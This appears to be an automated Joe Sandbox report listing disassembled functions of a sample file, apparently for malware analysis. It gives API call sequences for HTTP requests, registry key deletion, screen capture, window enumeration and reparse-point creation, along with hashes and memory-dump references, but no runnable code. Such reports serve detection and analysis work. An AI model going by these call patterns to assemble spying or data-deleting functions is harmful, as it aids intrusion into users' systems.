                                                                                                              • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00DE6E5F
                                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DE6E81
                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DE6E94
                                                                                                            • DestroyWindow.USER32(?), ref: 00DE6EB5
                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D50000,00000000), ref: 00DE6EE4
                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DE6EFD
                                                                                                            • GetDesktopWindow.USER32 ref: 00DE6F16
                                                                                                            • GetWindowRect.USER32(00000000), ref: 00DE6F1D
                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DE6F35
                                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DE6F4D
                                                                                                              • Part of subcall function 00D69944: GetWindowLongW.USER32(?,000000EB), ref: 00D69952
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                            • String ID: 0$tooltips_class32
                                                                                                            • API String ID: 2429346358-3619404913
                                                                                                            • Opcode ID: ce16521dfa571dc270e7399ada2fe4c94c771e96c64f178cd704307955a1ee58
                                                                                                            • Instruction ID: a51d571bcd32876490dd46cc464a2f3ba21369cfb4a1c183962adc7bc46efcaf
                                                                                                            • Opcode Fuzzy Hash: ce16521dfa571dc270e7399ada2fe4c94c771e96c64f178cd704307955a1ee58
                                                                                                            • Instruction Fuzzy Hash: 1D718B70104380AFDB20EF19D884BAABBE9FF99740F08441DF98997261D770ED4ACB21
                                                                                                            APIs
                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DCC4B0
                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DCC4C3
                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DCC4D7
                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DCC4F0
                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00DCC533
                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DCC549
                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DCC554
                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DCC584
                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DCC5DC
                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DCC5F0
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00DCC5FB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3800310941-3916222277
                                                                                                            • Opcode ID: 8b876e05ff9f43af64397dcfc27d84c9fa4bea7bf5a3cfa2e095a5f260fbda8f
                                                                                                            • Instruction ID: 7425ceca8b581c42503e51fda602150eea9ee7e9d1cef2b64b27d1d7c90fa1e2
                                                                                                            • Opcode Fuzzy Hash: 8b876e05ff9f43af64397dcfc27d84c9fa4bea7bf5a3cfa2e095a5f260fbda8f
                                                                                                            • Instruction Fuzzy Hash: 14515BB152074ABFDB219F64C988FAA7BBCEB08344F04941DFA49D7650EB30E9459B70
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00DE8592
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00DE85A2
                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00DE85AD
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DE85BA
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00DE85C8
                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00DE85D7
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00DE85E0
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DE85E7
                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00DE85F8
                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00DEFC38,?), ref: 00DE8611
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00DE8621
                                                                                                            • GetObjectW.GDI32(?,00000018,000000FF), ref: 00DE8641
                                                                                                            • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00DE8671
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00DE8699
                                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DE86AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 3840717409-0
                                                                                                            • Opcode ID: 5df70a48eecf5c447e56890df5e4db685063b82499a2f98e66926dbc3432039d
                                                                                                            • Instruction ID: ff3395a19624a6e7959db125f1f349e8486db0acd5ef704937fa906ec71bcdd3
                                                                                                            • Opcode Fuzzy Hash: 5df70a48eecf5c447e56890df5e4db685063b82499a2f98e66926dbc3432039d
                                                                                                            • Instruction Fuzzy Hash: 8941F975610384AFDB11EFA5DC88EAE7BB8EF89715F144058F919EB260DB309902DB70
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 00DC1502
                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00DC150B
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DC1517
                                                                                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00DC15FB
                                                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 00DC1657
                                                                                                            • VariantInit.OLEAUT32(?), ref: 00DC1708
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00DC178C
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DC17D8
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DC17E7
                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 00DC1823
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                            • API String ID: 1234038744-3931177956
                                                                                                            • Opcode ID: 052633b9573b34610d469f2dabb3b220ae853b1b1a27571a65c88497c2290c48
                                                                                                            • Instruction ID: 2fd0479b72f3e591a4fc4a8730789a80a4a676ab1ccaf9d05f191733469df3c5
                                                                                                            • Opcode Fuzzy Hash: 052633b9573b34610d469f2dabb3b220ae853b1b1a27571a65c88497c2290c48
                                                                                                            • Instruction Fuzzy Hash: 1AD11375A10222DBCB00AF65D885F79B7B5FF46700F54849AE846AB282DB30EC45DB71
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DDC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DDB6AE,?,?), ref: 00DDC9B5
                                                                                                              • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDC9F1
                                                                                                              • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA68
                                                                                                              • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA9E
                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DDB6F4
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DDB772
                                                                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 00DDB80A
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00DDB87E
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00DDB89C
                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DDB8F2
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DDB904
                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DDB922
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00DDB983
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00DDB994
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                            • API String ID: 146587525-4033151799
                                                                                                            • Opcode ID: a974b78bb67fbdaaa767e60051e02746cf28c04d7dbc90a65eaad5b8c7785936
                                                                                                            • Instruction ID: cd7475fd6aa65e107629135cc9d17417f384536d3ade970c6222d959118ed7eb
                                                                                                            • Opcode Fuzzy Hash: a974b78bb67fbdaaa767e60051e02746cf28c04d7dbc90a65eaad5b8c7785936
                                                                                                            • Instruction Fuzzy Hash: 63C17D34204341EFD714DF14C495F2ABBE5EF84318F59855EE89A8B3A2CB31E846CBA1
                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 00DD25D8
                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00DD25E8
                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 00DD25F4
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00DD2601
                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00DD266D
                                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00DD26AC
                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00DD26D0
                                                                                                            • SelectObject.GDI32(?,?), ref: 00DD26D8
                                                                                                            • DeleteObject.GDI32(?), ref: 00DD26E1
                                                                                                            • DeleteDC.GDI32(?), ref: 00DD26E8
                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00DD26F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                            • String ID: (
                                                                                                            • API String ID: 2598888154-3887548279
                                                                                                            • Opcode ID: a23c8bf66785d7d02321d212d9a6785cf2d01e3b9706e79e0d67309ea36332f9
                                                                                                            • Instruction ID: 6d04c249ba304fbc6b4ee9b0e97eb5a43f67aaa95aa962a9c42c4cd01a3597f3
                                                                                                            • Opcode Fuzzy Hash: a23c8bf66785d7d02321d212d9a6785cf2d01e3b9706e79e0d67309ea36332f9
                                                                                                            • Instruction Fuzzy Hash: 6661E175D00319EFCF15DFA8D884AAEBBB5FF48310F20852AE955A7350D770A9418F60
                                                                                                            APIs
                                                                                                            • ___free_lconv_mon.LIBCMT ref: 00D8DAA1
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D659
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D66B
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D67D
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D68F
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6A1
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6B3
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6C5
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6D7
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6E9
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6FB
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D70D
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D71F
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D731
                                                                                                            • _free.LIBCMT ref: 00D8DA96
                                                                                                              • Part of subcall function 00D829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
                                                                                                              • Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0
                                                                                                            • _free.LIBCMT ref: 00D8DAB8
                                                                                                            • _free.LIBCMT ref: 00D8DACD
                                                                                                            • _free.LIBCMT ref: 00D8DAD8
                                                                                                            • _free.LIBCMT ref: 00D8DAFA
                                                                                                            • _free.LIBCMT ref: 00D8DB0D
                                                                                                            • _free.LIBCMT ref: 00D8DB1B
                                                                                                            • _free.LIBCMT ref: 00D8DB26
                                                                                                            • _free.LIBCMT ref: 00D8DB5E
                                                                                                            • _free.LIBCMT ref: 00D8DB65
                                                                                                            • _free.LIBCMT ref: 00D8DB82
                                                                                                            • _free.LIBCMT ref: 00D8DB9A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                            • String ID:
                                                                                                            • API String ID: 161543041-0
                                                                                                            • Opcode ID: bbec238448e6651519c944b9bb80f77e61f59d2ec6f6f07af3351416151c4686
                                                                                                            • Instruction ID: 4663ce9ab6671a7762158068c22d0712a2c8336ae04780a9d9feb7a52c0ce7aa
                                                                                                            • Opcode Fuzzy Hash: bbec238448e6651519c944b9bb80f77e61f59d2ec6f6f07af3351416151c4686
                                                                                                            • Instruction Fuzzy Hash: 67311931644605AFEB25BA39E845B6A77EAFF10320F2A4419E459D71D1DF35AC808B30
                                                                                                            APIs
                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00DB369C
                                                                                                            • _wcslen.LIBCMT ref: 00DB36A7
                                                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00DB3797
                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00DB380C
                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00DB385D
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00DB3882
                                                                                                            • GetParent.USER32(?), ref: 00DB38A0
                                                                                                            • ScreenToClient.USER32(00000000), ref: 00DB38A7
                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00DB3921
                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00DB395D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                            • String ID: %s%u
                                                                                                            • API String ID: 4010501982-679674701
                                                                                                            • Opcode ID: 2df93a874e030c989540c513820fc1dbf198baf80d55bab24c3729647944a14b
                                                                                                            • Instruction ID: 2610b47ec48a88feef19fcedc728f00ac5a7fd16f4751f2368615ef1818250d7
                                                                                                            • Opcode Fuzzy Hash: 2df93a874e030c989540c513820fc1dbf198baf80d55bab24c3729647944a14b
                                                                                                            • Instruction Fuzzy Hash: E891A171204706EFDB19DF24C885BEAB7A8FF44350F048529F99AC6190EB30EA45DBB1
                                                                                                            APIs
                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00DB4994
                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00DB49DA
                                                                                                            • _wcslen.LIBCMT ref: 00DB49EB
                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00DB49F7
                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00DB4A2C
                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00DB4A64
                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00DB4A9D
                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00DB4AE6
                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00DB4B20
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00DB4B8B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                            • String ID: ThumbnailClass
                                                                                                            • API String ID: 1311036022-1241985126
                                                                                                            • Opcode ID: 5a2c29de732c589f2d23ddc3587ae187275294eda2062fca2994ec07d6f2f467
                                                                                                            • Instruction ID: f152069514a3bb2cc6f81f89fb982818890377fc762d17c59cc876c3288580d8
                                                                                                            • Opcode Fuzzy Hash: 5a2c29de732c589f2d23ddc3587ae187275294eda2062fca2994ec07d6f2f467
                                                                                                            • Instruction Fuzzy Hash: AF919E71104305DBDB04DF14C981BEABBA8EF44714F08846DFE869A196EB30ED45CBB5
                                                                                                            APIs
                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DDCC64
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00DDCC8D
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DDCD48
                                                                                                              • Part of subcall function 00DDCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00DDCCAA
                                                                                                              • Part of subcall function 00DDCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00DDCCBD
                                                                                                              • Part of subcall function 00DDCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DDCCCF
                                                                                                              • Part of subcall function 00DDCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DDCD05
                                                                                                              • Part of subcall function 00DDCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DDCD28
                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DDCCF3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                            • API String ID: 2734957052-4033151799
                                                                                                            • Opcode ID: 5b9079ea45c43ef4d75b749c59c62734b41ce2e098fb180fc25e98ad0e9501fb
                                                                                                            • Instruction ID: ed417215a2b9626c425b72efe188acb011271bc9b4ad0dde377535a5ea80ec84
                                                                                                            • Opcode Fuzzy Hash: 5b9079ea45c43ef4d75b749c59c62734b41ce2e098fb180fc25e98ad0e9501fb
                                                                                                            • Instruction Fuzzy Hash: EC316F7192122ABBDB209B94DC88EFFBB7CEF45750F041166F905E6340DB349A46DAB0
                                                                                                            APIs
                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00DC3D40
                                                                                                            • _wcslen.LIBCMT ref: 00DC3D6D
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DC3D9D
                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00DC3DBE
                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00DC3DCE
                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00DC3E55
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DC3E60
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DC3E6B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                            • String ID: :$\$\??\%s
                                                                                                            • API String ID: 1149970189-3457252023
                                                                                                            • Opcode ID: 1519cb859c6a1a8a72a36c3e26fb7124fc95b30e796a29b10385d428f18e79ba
